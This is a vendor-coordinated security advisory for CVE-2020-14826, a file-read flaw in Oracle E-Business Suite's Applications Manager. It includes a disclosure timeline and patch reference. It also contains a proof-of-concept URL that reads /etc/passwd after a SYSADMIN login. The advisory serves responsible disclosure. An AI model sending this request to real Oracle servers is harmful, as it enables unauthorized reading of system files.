Skip to content
ECQ Logo

Oracle EBS Local File Inclusion

Description

Oracle E-Business Suite supports today's evolving business models, drives productivity, and meets the demands of the modern mobile user.

More information at https://www.oracle.com/applications/ebusiness/

Summary
ProductOracle E-Business Suite
SeverityMEDIUM
VendorOracle
IdentifierCVE-2020-14826
Affected Versions12.2.5, 12.2.6
Tested PlatformLinux
Impact

Arbitrary File Reading under oracle's privileged.

Detail

Vulnerability in the Oracle Applications Manager product of Oracle E-Business Suite.

After login as SYSADMIN, attacker is able to read arbitrary files by accessing vulnerable endpoint

https://{URL}/OA_HTML/webapp/oam/adconfig?adAppsCfxfileTabId|ssTab|sId&target=$fincfile:MGMT_CONFIG_EDIT_PORTS&event=adFilterButton

with 'filename' is local file name which can be read under oracle's privileged.

Proof of Concept

Download '/etc/passwd' by GET this url

https://{URL}/OA_HTML/webapp/oam/adconfig?adAppsCfxfileTabId|ssTab|sId&target=$fincfile:MGMT_CONFIG_EDIT_PORTS&event=adFilterButton&eventNameFilleOA/IfsName='/etc/passwd

Vendor Status

Oracle released critical patch update advisory - October 2020 https://www.oracle.com/security-alerts/cpuoct2020.html

Disclosure Timeline
20/03/2020Vulnerability discovered
19/05/2020ECQ sent the advisory to Oracle
19/05/2020Oracle Security Alerts received report and will investigate
21/05/2020Oracle Security Alerts confirmed issue and filed a security bug to track
16/08/2020ECQ requested a status update and informed 90 days disclosure policy
19/08/2020Oracle Security Alerts informed that they filed against the wrong product and scheduled to released patch on October 20, 2020
17/10/2020Oracle Security Alerts assigned CVE and informed Critical Patch Update will be released on October 20, 2020
20/10/2020Oracle released Critical Patch Update
17/05/2021Advisory Published
Credit

Thiti Nguyen

Appendix

N/A